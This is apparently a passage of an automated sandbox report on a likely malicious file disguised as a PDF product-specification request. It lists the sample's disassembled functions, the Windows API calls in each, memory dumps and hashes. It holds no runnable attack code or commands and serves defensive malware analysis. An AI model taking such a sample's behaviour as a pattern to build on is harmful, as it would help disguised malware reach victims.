                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 00A6D249
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                • String ID:
                                                                                                                • API String ID: 173952441-0
                                                                                                                • Opcode ID: 05866fb3cdd7232e0fcca1629f6cb4f958af74f3115944121e5dd0bbf347aedd
                                                                                                                • Instruction ID: 3087809e78ea19ddaaa1c25ae69a80a5b6cc1de6a0e1691db266f52783ba808a
                                                                                                                • Opcode Fuzzy Hash: 05866fb3cdd7232e0fcca1629f6cb4f958af74f3115944121e5dd0bbf347aedd
                                                                                                                • Instruction Fuzzy Hash: 4D01D236E05204BBDB119BB5DC09BEA7B79EF827B0F104319F925961D0CB71C941C6A0
                                                                                                                Function 00A4600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A4604C
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A46060
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A4606A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3970641297-0
                                                                                                                • Opcode ID: 2f76992a9b8bb2b3561db003d98fd6ef0f193aa519bc7ce1eb365aaeac1f1503
                                                                                                                • Instruction ID: fa51283c979705f1f4d39eb12d3120e2caab4aed237277e2ffa1f14f8c98c071
                                                                                                                • Opcode Fuzzy Hash: 2f76992a9b8bb2b3561db003d98fd6ef0f193aa519bc7ce1eb365aaeac1f1503
                                                                                                                • Instruction Fuzzy Hash: A411ADB2102509BFEF128FA4CC44EEABB6DFF893A5F044202FA1552010D732DC60DBA1
                                                                                                                Function 00A63B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00A63B56
                                                                                                                  • Part of subcall function 00A63AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A63AD2
                                                                                                                  • Part of subcall function 00A63AA3: ___AdjustPointer.LIBCMT ref: 00A63AED
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00A63B6B
                                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A63B7C
                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00A63BA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                • String ID:
                                                                                                                • API String ID: 737400349-0
                                                                                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                • Instruction ID: 75223604e9d7ca5502f1dcb42cf3c71483ab95f823086d69e33d25fc772a102a
                                                                                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                • Instruction Fuzzy Hash: D9012933100149BBDF126F95CD46EEB3B79EF59754F054014FE4856121C732E962EBA0
                                                                                                                Function 00A73073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A413C6,00000000,00000000,?,00A7301A,00A413C6,00000000,00000000,00000000,?,00A7328B,00000006,FlsSetValue), ref: 00A730A5
                                                                                                                • GetLastError.KERNEL32(?,00A7301A,00A413C6,00000000,00000000,00000000,?,00A7328B,00000006,FlsSetValue,00AE2290,FlsSetValue,00000000,00000364,?,00A72E46), ref: 00A730B1
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A7301A,00A413C6,00000000,00000000,00000000,?,00A7328B,00000006,FlsSetValue,00AE2290,FlsSetValue,00000000), ref: 00A730BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3177248105-0
                                                                                                                • Opcode ID: 81bc74b169fbfdf95e900a90152643e258bfa424da4b2bacd9dc22d46940e95c
                                                                                                                • Instruction ID: 80d0bc1057749f1f8a8285f0a9ed20d0fc6c452c5bff2ad01c3bb600d02eddfa
                                                                                                                • Opcode Fuzzy Hash: 81bc74b169fbfdf95e900a90152643e258bfa424da4b2bacd9dc22d46940e95c
                                                                                                                • Instruction Fuzzy Hash: F501D833352232ABCF219BB8AC4499777989F45771B12C720F90AD7140D721D903D6D0
                                                                                                                Function 00AA7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00AA747F
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AA7497
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AA74AC
                                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00AA74CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352324309-0
                                                                                                                • Opcode ID: 85124a82bfee672b631c2d642cd8da664cf7a24b6c3128d262f15215900baf0c
                                                                                                                • Instruction ID: f63791c73ee8a0d998b89a5892fd8655be1e095a1793bda7ab736cef30125a2d
                                                                                                                • Opcode Fuzzy Hash: 85124a82bfee672b631c2d642cd8da664cf7a24b6c3128d262f15215900baf0c
                                                                                                                • Instruction Fuzzy Hash: CE11ADB520A311AFE720CF58DC08B9B7BFCEB09B10F50856AA616D7191D7B0E904DB60
                                                                                                                Function 00AAB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB0C4
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB0E9
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB0F3
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB126
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2875609808-0
                                                                                                                • Opcode ID: 443861d72e2f465733416ab487fc9f21dd6142a60384c111fb0dabc17b7d78dd
                                                                                                                • Instruction ID: 44c7f63c317945b2fe946bc6122908a37fd7dd457e0c3830d56fd36fe1fd123b
                                                                                                                • Opcode Fuzzy Hash: 443861d72e2f465733416ab487fc9f21dd6142a60384c111fb0dabc17b7d78dd
                                                                                                                • Instruction Fuzzy Hash: F3113931C11529E7CF00EFE5E9586EEBB78FF0A721F504296E941B3182CB305651CB61
                                                                                                                Function 00AA2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AA2DC5
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA2DD6
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AA2DDD
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AA2DE4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2710830443-0
                                                                                                                • Opcode ID: e59d6a725f16fad15164207fe0a2700f83340fd8b681656d89cd226e07715b48
                                                                                                                • Instruction ID: 8aad115bc0b13f48480492696be9b67d4d62c3a8875444e0502e7bf1ab75dfc0
                                                                                                                • Opcode Fuzzy Hash: e59d6a725f16fad15164207fe0a2700f83340fd8b681656d89cd226e07715b48
                                                                                                                • Instruction Fuzzy Hash: BEE06D711022357ADB205BA69C0DFEB7F6CEF43BB1F801116B506D20C19BA4C942C6B0
                                                                                                                Function 00AD8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A59693
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596A2
                                                                                                                  • Part of subcall function 00A59639: BeginPath.GDI32(?), ref: 00A596B9
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596E2
                                                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AD8887
                                                                                                                • LineTo.GDI32(?,?,?), ref: 00AD8894
                                                                                                                • EndPath.GDI32(?), ref: 00AD88A4
                                                                                                                • StrokePath.GDI32(?), ref: 00AD88B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 1539411459-0
                                                                                                                • Opcode ID: b6191970dac3dc43b6a11e55b29eec045d704e914e556e2e4275103da10238ec
                                                                                                                • Instruction ID: 789f76fdec17e077170d2cd5c98d083b0dd45f60be821832b639c18cf96ddc11
                                                                                                                • Opcode Fuzzy Hash: b6191970dac3dc43b6a11e55b29eec045d704e914e556e2e4275103da10238ec
                                                                                                                • Instruction Fuzzy Hash: 14F09A36002259FADB129F94AC0DFCE3B19AF06320F808002FA12660E1CB781512DBA5
                                                                                                                Function 00A598B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 00A598CC
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00A598D6
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00A598E9
                                                                                                                • GetStockObject.GDI32(00000005), ref: 00A598F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ModeObjectStockText
                                                                                                                • String ID:
                                                                                                                • API String ID: 4037423528-0
                                                                                                                • Opcode ID: 07e24ab18cc3d6c2f1817c1e23da719786164a2d13faff092b605d1f3a01c27e
                                                                                                                • Instruction ID: b579adec031cfa7bc889db2a3877b88912073c001f6feed1d79115545d4d65db
                                                                                                                • Opcode Fuzzy Hash: 07e24ab18cc3d6c2f1817c1e23da719786164a2d13faff092b605d1f3a01c27e
                                                                                                                • Instruction Fuzzy Hash: 06E06D31245291AADF219BB4BC09BED3F60AB12336F44831AF6FB580E1C3714641DB20
                                                                                                                Function 00AA162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 00AA1634
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AA11D9), ref: 00AA163B
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AA11D9), ref: 00AA1648
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AA11D9), ref: 00AA164F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: 68d350d0943943fd1c194cc00a719493317ff621a3bbd80637f1bce95134b716
                                                                                                                • Instruction ID: 71a57db7e934b42cce6850e0d53aebfa850d779d6d02fdc5d24dfd3cce075b9a
                                                                                                                • Opcode Fuzzy Hash: 68d350d0943943fd1c194cc00a719493317ff621a3bbd80637f1bce95134b716
                                                                                                                • Instruction Fuzzy Hash: 8BE08631603212EBD7205FE09E0DB863B7CAF457B5F144809F246CA080D7344542C750
                                                                                                                Function 00A9D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00A9D858
                                                                                                                • GetDC.USER32(00000000), ref: 00A9D862
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A9D882
                                                                                                                • ReleaseDC.USER32(?), ref: 00A9D8A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 612b38d690397dc71fbc9489131213fe4d3082c0d84caf6f103c859b6e3f774e
                                                                                                                • Instruction ID: 6632908ee40e8170e5bea60c42ca8ee23f3bd1423dab63989ccbf3096afa0fad
                                                                                                                • Opcode Fuzzy Hash: 612b38d690397dc71fbc9489131213fe4d3082c0d84caf6f103c859b6e3f774e
                                                                                                                • Instruction Fuzzy Hash: C9E01AB4801206DFCF41DFE0D90866DBBB1FB08321F54900AE807E7250C7388946EF40
                                                                                                                Function 00A9D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00A9D86C
                                                                                                                • GetDC.USER32(00000000), ref: 00A9D876
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A9D882
                                                                                                                • ReleaseDC.USER32(?), ref: 00A9D8A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 11b0d9da5c895eff86702211d35344e759abd0fcb53ef84660da5748df8f1d7b
                                                                                                                • Instruction ID: ea6cec30843e14864a94a8cb82d8252cd574a06d321854178f73080ac00d21e6
                                                                                                                • Opcode Fuzzy Hash: 11b0d9da5c895eff86702211d35344e759abd0fcb53ef84660da5748df8f1d7b
                                                                                                                • Instruction Fuzzy Hash: 1CE01A74801201DFCB50DFE0D80866DBBB1FB08321B54900AE80BE7250C7389906DF40
                                                                                                                Function 00AB4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00AB4ED4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection_wcslen
                                                                                                                • String ID: *$LPT
                                                                                                                • API String ID: 1725874428-3443410124
                                                                                                                • Opcode ID: 3a968d498f189ca7d792c4fbe2e4dfe96f6b8c70e55d6dc50d15cf3f263f883d
                                                                                                                • Instruction ID: f37b4b188fd25a66e39eca5d44f3849aee9f80d00f9babb09d11aa01a1718c6e
                                                                                                                • Opcode Fuzzy Hash: 3a968d498f189ca7d792c4fbe2e4dfe96f6b8c70e55d6dc50d15cf3f263f883d
                                                                                                                • Instruction Fuzzy Hash: 2B915C75A002549FCB14DF68C584EAABBF5BF48704F198099E80A9F3A3C735ED85CB91
                                                                                                                Function 00A5E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
